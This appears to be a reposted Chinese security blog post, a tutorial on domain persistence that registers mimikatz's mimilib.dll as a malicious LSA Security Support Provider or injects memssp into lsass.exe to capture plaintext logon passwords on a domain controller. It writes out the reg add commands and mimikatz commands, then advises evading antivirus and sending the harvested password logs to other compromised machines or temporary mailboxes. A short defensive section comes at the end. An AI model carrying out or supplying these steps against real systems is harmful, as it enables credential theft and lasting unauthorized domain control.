域渗透|域权限维持之SSP

admin 2022年1月10日19:53:12安全文章评论23 views1207字阅读4分1秒阅读模式
域渗透|域权限维持之SSP

点击上方蓝字关注我们


域渗透|域权限维持之SSP


0x00 测试环境

域控服务器:Win-2008DC—10.10.10.30

域:god.com


0x01 前言

SSP即Security Support Provider(安全支持提供者)是一个用于实现身份验证的DLL文件,主要用于Windows操作系统的身份认证功能。

当操作系统启动时SSP会被加载到lsass.exe进程中,由于lsass可通过注册表进行扩展,导致了在操作系统启动时,可以加载一个自定义的dll,来实现想要执行的操作。

当我们在域环境内对LSA进行拓展自定义DLL文件时,就能够获取到lsass.exe进程中的明文密码,即使修改密码重新登陆,我们依旧可以获得密码,达到域权限维持的效果。


0x02 利用


方法一、修改注册表扩展功能

1、首先将mimikatz中的 mimilib.dll 传到目标域控的c:windowssystem32目录下,使用dll的位数与目标操作系统保持一致。

域渗透|域权限维持之SSP


2、修改注册表,在键值Security Packages下添加 mimilib.dll,系统重启后会记录登陆密码。

reg query HKLMSystemCurrentControlSetControlLsa /v "Security Package"
reg add "HKLMSystemCurrentControlSetControlLsa" /v "Security Packages" /d "kerberosmsv1_0schannelwdigesttspkgpku2umimilib" /t REG_MULTI_SZ
域渗透|域权限维持之SSP


修改成功后的注册表如下图所示:

域渗透|域权限维持之SSP



3、重启目标系统,重启后有用户登陆到当前系统,会在c:windowssystem32目录下生成一个记录登陆账号密码的kiwissp.log文件。

域渗透|域权限维持之SSP

域渗透|域权限维持之SSP


方法二、进程注入lsass.exe


1、使用mimikatz对lsass.exe进程注入,会在C:WindowsSystem32生成一个mimilsa.log日志文件,里面包含当前登陆的明文密码。

privilege::debugmisc::memssp

域渗透|域权限维持之SSP

域渗透|域权限维持之SSP


0x03 总结

攻防实战中,靶机很难会重启,攻击者重启的话风险过大,因此可以在靶机上把两个方法相互结合起来使用效果比较好,前提需要做好免杀,并且可以尝试利用把生成的日志密码文件发送到其他内网被控机器或者临时邮箱。


0x04 防御

对于两种方法的详细分析,在防御策略上也要根据攻击步骤进行防御:首先检查注册表中HKLMSystemCurrentControlSetControlLsaSecurity Packages项中是否含有可疑的DLL文件、再检查C:WindowsSystem32目录下是否存在可疑的DLL文件,最后可以使用第三方的工具来查看LSA中是否存在可疑DLL文件。


☆ END ☆
域渗透|域权限维持之SSP

长按关注

灼剑(Tsojan)安全团队



域渗透|域权限维持之SSP

点个在看你最好看


域渗透|域权限维持之SSP


本文始发于微信公众号(哈拉少安全小队):域渗透|域权限维持之SSP

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日19:53:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  域渗透|域权限维持之SSP http://cn-sec.com/archives/456431.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: